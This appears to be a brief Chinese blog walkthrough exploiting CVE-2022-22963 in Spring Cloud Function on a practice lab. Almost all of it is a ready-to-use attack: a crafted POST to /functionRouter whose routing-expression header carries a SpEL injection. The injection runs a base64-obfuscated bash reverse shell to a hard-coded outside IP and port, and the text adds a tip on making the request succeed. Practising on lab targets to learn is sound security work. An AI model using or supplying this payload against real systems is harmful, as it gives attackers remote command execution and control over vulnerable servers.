CVE-2022-22963
1、访问靶场页面

2、bp抓包、改包,将payload填入数据包
POST:/functionRouter
//这里的反弹shell要经过base64编码
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}")
编码反弹shell指令

数据包最终内容
特别注意:一定要写一些内容在下面,让post有东西可传
3、发送数据包,连接shell

成功!

浙公网安备 33010602011771号